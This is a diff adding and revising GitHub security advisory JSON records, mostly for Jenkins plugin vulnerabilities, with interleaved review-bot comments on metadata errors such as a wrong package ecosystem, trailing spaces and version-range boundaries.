@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-46rr-87h4-f5q6", + "modified": "2024-01-30T21:13:29Z", + "published": "2022-05-24T17:03:47Z", + "aliases": [ + "CVE-2019-16561" + ], + "summary": "SSL/TLS certificate validation globally and unconditionally disabled by Jenkins WebSphere Deployer Plugin ", + "details": "Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows users with Overall/Read access to disable SSL/TLS certificate and hostname validation for the entire Jenkins master JVM.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:websphere-deployer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.6.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16561" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1581" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:13:29Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json b/advisories/github-reviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json new file mode 100644 index 0000000000000..aa4f8c1118494 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json 
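Review bot: The `summary` string ends with a trailing space (`… WebSphere Deployer Plugin "`), which is part of the value and will surface in any rendering or exact-match lookup of titles; the `summary` of GHSA-56gj-927p-mfph in this batch has the same trailing space. Trim it: `"summary": "SSL/TLS certificate validation globally and unconditionally disabled by Jenkins WebSphere Deployer Plugin",`.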
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-477r-v22q-r42f", + "modified": "2024-01-30T22:36:17Z", + "published": "2022-05-17T00:29:00Z", + "aliases": [ + "CVE-2017-1000088" + ], + "summary": "Persisted XSS Vulnerability in Jenkins Sidebar Link Plugin", + "details": "The Sidebar Link plugin allows users able to configure jobs, views, and agents to add entries to the sidebar of these objects. There was no input validation, which meant users were able to use javascript: schemes for these links.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:sidebar-link" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.8" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000088" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:17Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json b/advisories/github-reviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json new file mode 100644 index 0000000000000..bfc6496c277ad --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47rr-8vrp-9283", + "modified": "2024-01-30T21:23:57Z", + "published": "2022-05-24T16:52:45Z", + "aliases": [ + "CVE-2019-10375" + ], + "summary": "Arbitrary file read vulnerability in Jenkins File System SCM Plugin", + "details": "An arbitrary file read vulnerability in Jenkins File System SCM Plugin 2.1 and earlier allows attackers able to configure jobs in Jenkins to obtain the contents of any file on the Jenkins master.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins.filesystem_scm:filesystem_scm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10375" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-569" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:23:57Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json b/advisories/github-reviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json new file mode 100644 index 0000000000000..c91476e6c8c00 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-492x-gfqx-wpf3", + "modified": "2024-01-30T22:03:31Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003077" + ], + "summary": "Missing permission check in Jenkins Audit to Database Plugin", + "details": "A missing permission check in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:audit2db" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003077" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:03:31Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json b/advisories/github-reviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json new file mode 100644 index 0000000000000..eade64b0f59e7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mvc-33v7-cqc3", + "modified": "2024-01-30T22:21:58Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003087" + ], + "summary": "Missing permission check in Jenkins sinatra-chef-builder Plugin", + "details": "A missing permission check in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:sinatra-chef-builder" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.20" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003087" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:21:58Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json b/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json index 60490e91e7019..3914afad16f1f 100644 --- a/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json +++ b/advisories/github-reviewed/2022/05/GHSA-525g-rvh4-v5c9/GHSA-525g-rvh4-v5c9.json 
@@ -78,10 +78,18 @@
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7926"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7926.yaml"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/magento/magento2"
     },
+    {
+      "type": "WEB",
+      "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23"
+    },
     {
       "type": "WEB",
       "url": "https://web.archive.org/web/20220121051916/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23"
diff --git a/advisories/github-reviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json b/advisories/github-reviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json
new file mode 100644
index 0000000000000..861759c6d989d
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5293-3fgp-cr3x", + "modified": "2024-01-30T21:58:47Z", + "published": "2022-05-13T01:18:19Z", + "aliases": [ + "CVE-2017-1000086" + ], + "summary": "Missing permission checks in Jenkins Periodic Backup Plugin allow every user to change settings", + "details": "The Periodic Backup Plugin did not perform any permission checks, allowing any user with Overall/Read access to change its settings, trigger backups, restore backups, download backups, and also delete all previous backups via log rotation. Additionally, the plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:periodicbackup" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000086" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/100437" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:58:47Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json b/advisories/github-reviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json new file mode 100644 index 0000000000000..8946ecf3a44fb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json 
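Review bot: `cwe_ids` lists only CWE-862 although the `details` text also describes a second weakness — the plugin's API did not require POST, "opening itself to Cross-Site Request Forgery attacks" — so the classification is narrower than the description. Adding the CSRF entry, `"cwe_ids": [ "CWE-862", "CWE-352" ]`, would make the record's taxonomy match its own text.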
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5339-9974-hqj9", + "modified": "2024-01-30T22:10:56Z", + "published": "2022-05-14T02:21:28Z", + "aliases": [ + "CVE-2018-1999039" + ], + "summary": "Server-Side Request Forgery (SSRF) in Jenkins Confluence Publisher Plugin", + "details": "A server-side request forgery vulnerability exists in Jenkins Confluence Publisher Plugin 2.0.1 and earlier in ConfluenceSite.java that allows attackers to have Jenkins submit login requests to an attacker-specified Confluence server URL with attacker specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:confluence-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.0.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999039" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-982" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:10:56Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json b/advisories/github-reviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json new file mode 100644 index 0000000000000..f4843069910cd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json 
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5532-prrf-rf5x", + "modified": "2024-01-30T22:43:47Z", + "published": "2022-05-13T01:41:14Z", + "aliases": [ + "CVE-2017-1000403" + ], + "summary": "Arbitrary code execution vulnerability in Jenkins Speaks! Plugin", + "details": "Jenkins Speaks! Plugin, all current versions, allows users with Job/Configure permission to run arbitrary Groovy code inside the Jenkins JVM, effectively elevating privileges to Overall/Run Scripts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:speaks" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000403" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-10-11/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:43:47Z", + "nvd_published_at": "2018-01-26T02:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json b/advisories/github-reviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json new file mode 100644 index 0000000000000..97a0227f1a8bf --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56ff-m6pv-8594", + "modified": "2024-01-30T22:03:52Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003079" + ], + "summary": "Missing permission check in Jenkins VMware Lab Manager Slaves Plugin", + "details": "A missing permission check in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:labmanager" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.2.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003079" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:03:52Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json b/advisories/github-reviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json new file mode 100644 index 0000000000000..aa05c2517338f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json 
@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-56gj-927p-mfph",
+  "modified": "2024-01-30T21:19:12Z",
+  "published": "2022-05-24T16:55:59Z",
+  "aliases": [
+    "CVE-2019-10397"
+  ],
+  "summary": "Jenkins Aqua Security Serverless Scanner Plugin showed plain text password in job configuration form fields ",
+  "details": "Jenkins Aqua Security Serverless Scanner Plugin 1.0.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "org.jenkins-ci.plugins:aqua-serverless"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.0.5"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.0.4"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10397"
+    },
+    {
+      "type": "WEB",
+      "url": "https://jenkins.io/security/advisory/2019-09-12/#SECURTY-1509"
+    },
+    {
+      "type": "WEB",
+      "url": "http://www.openwall.com/lists/oss-security/2019/09/12/2"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-319"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2024-01-30T21:19:12Z",
+    "nvd_published_at": "2019-09-12T14:15:00Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json b/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json
index 1387b741ec50b..bcf575c261d2e 100644
--- a/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json
+++ b/advisories/github-reviewed/2022/05/GHSA-56hf-w8gm-448q/GHSA-56hf-w8gm-448q.json
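Review bot: `"ecosystem": "Packagist"` is paired with the Maven coordinate `org.jenkins-ci.plugins:aqua-serverless`; every other Jenkins plugin record in this batch uses `"ecosystem": "Maven"`, and a `groupId:artifactId` name has no meaning in Packagist, so consumers matching by ecosystem will never associate this advisory with the affected artifact. Change it to `"ecosystem": "Maven",`. Two smaller points in the same file: the Jenkins advisory anchor `#SECURTY-1509` departs from the `#SECURITY-<n>` form used by every other Jenkins reference here and is probably a typo (confirm the anchor on jenkins.io before changing it), and the `summary` value ends with a trailing space that should be trimmed.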
@@ -59,10 +59,18 @@
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8092"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8092.yaml"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/magento/magento2"
     },
+    {
+      "type": "WEB",
+      "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
+    },
     {
       "type": "WEB",
       "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
diff --git a/advisories/github-reviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json b/advisories/github-reviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json
new file mode 100644
index 0000000000000..38b40445c3e77
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json
@@ -0,0 +1,69 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-57gg-cj55-q5g2",
+  "modified": "2024-02-01T21:49:26Z",
+  "published": "2022-05-24T22:01:23Z",
+  "aliases": [
+    "CVE-2020-25816"
+  ],
+  "summary": "Token leases could outlive their TTL in HashiCorp Vault",
+  "details": "HashiCorp Vault and Vault Enterprise 1.0 before 1.5.4 have Incorrect Access Control.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/hashicorp/vault"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "1.0"
+            },
+            {
+              "fixed": "1.5.4"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25816"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/hashicorp/vault/pull/10020/commits/f192878110fe93eb13da914b2bee28caa7866a29"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#147"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#154"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.hashicorp.com/blog/category/vault"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-613"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2024-02-01T21:49:26Z",
+    "nvd_published_at": "2020-09-30T20:15:00Z"
+  }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json b/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json
index 7b50e169f3619..c9188fe644541 100644
--- a/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json
+++ b/advisories/github-reviewed/2022/05/GHSA-589q-75r3-mfq4/GHSA-589q-75r3-mfq4.json
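Review bot: `"introduced": "1.0"` is not a complete semver string; Go module versions are three-component (`v1.0.0`), and Go-ecosystem consumers that parse these events as semver may reject or mis-order a two-component value, so `"introduced": "1.0.0"` is the safer form. The references list `CHANGELOG.md#147` next to `#154`, which suggests the fix was also shipped on the 1.4.x line; if that is confirmed from the changelog, a single range from `1.0` to `< 1.5.4` marks the patched 1.4.x release as vulnerable and should be split into two ranges (one ending at the 1.4.x fix version, one from `1.5.0` to `< 1.5.4`). The `details` value is the bare NVD phrase `have Incorrect Access Control` and does not state what the `summary` claims about token leases outliving their TTL; one explanatory sentence drawn from the linked changelog entries would make the record self-contained. Both `CHANGELOG.md` links point at `blob/master`, so their heading anchors can drift; pinning them to a release tag would keep them durable.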
@@ -67,6 +67,10 @@ "type": "WEB", "url": "https://docs.silverstripe.org/en/4/changelogs/4.6.0/?_ga=2.170693920.105499209.1689776417-708940272.1689776417" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2020-6165.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2020-6165" diff --git a/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json b/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json index 178a09a79c446..f89e3ee6c265c 100644 --- a/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json +++ b/advisories/github-reviewed/2022/05/GHSA-594h-cx6w-p4jf/GHSA-594h-cx6w-p4jf.json @@ -117,10 +117,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.2.2" - } + ] } ], "references": [ @@ -128,6 +125,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3941" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-3941.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/" + }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00028.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json b/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json index 355e51513efff..1ce7231a3da74 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json +++ b/advisories/github-reviewed/2022/05/GHSA-5957-5crx-79jx/GHSA-5957-5crx-79jx.json 
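Review bot: Dropping `"last_known_affected_version_range": "<= 6.2.2"` in the GHSA-594h-cx6w-p4jf hunk leaves that affected entry relying solely on its `events`, but the events are outside the hunk, so it cannot be seen here whether a `fixed` event now bounds the range; if the entry still has only an `introduced` event, removing the hint silently widens the match to every later version. The affected object this belongs to starts before the hunk. The same removal (`"<= 2.2.2"`) is made in GHSA-5qp6-78pr-gv8c and deserves the same check.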
@@ -18,17 +18,36 @@ { "package": { "ecosystem": "Packagist", - "name": "zendframework/zendframework" + "name": "zendframework/zend-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0.0beta4" }, { - "fixed": "1.12.12" + "fixed": "2.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0rc1" + }, + { + "fixed": "2.4.1" } ] } @@ -71,6 +90,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zendframework1" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "zendframework/zend-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.12" + } + ] + } + ] } ], "references": [ @@ -79,12 +136,24 @@ "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3154" }, { - "type": "PACKAGE", - "url": "https://github.com/zendframework/zendframework" + "type": "WEB", + "url": "https://framework.zend.com/security/advisory/ZF2015-04" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zend-http/CVE-2015-3154.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-3154.yaml" }, { "type": "WEB", - "url": "http://framework.zend.com/security/advisory/ZF2015-04" + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework1/CVE-2015-3154.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/zendframework/zendframework" } ], "database_specific": { 
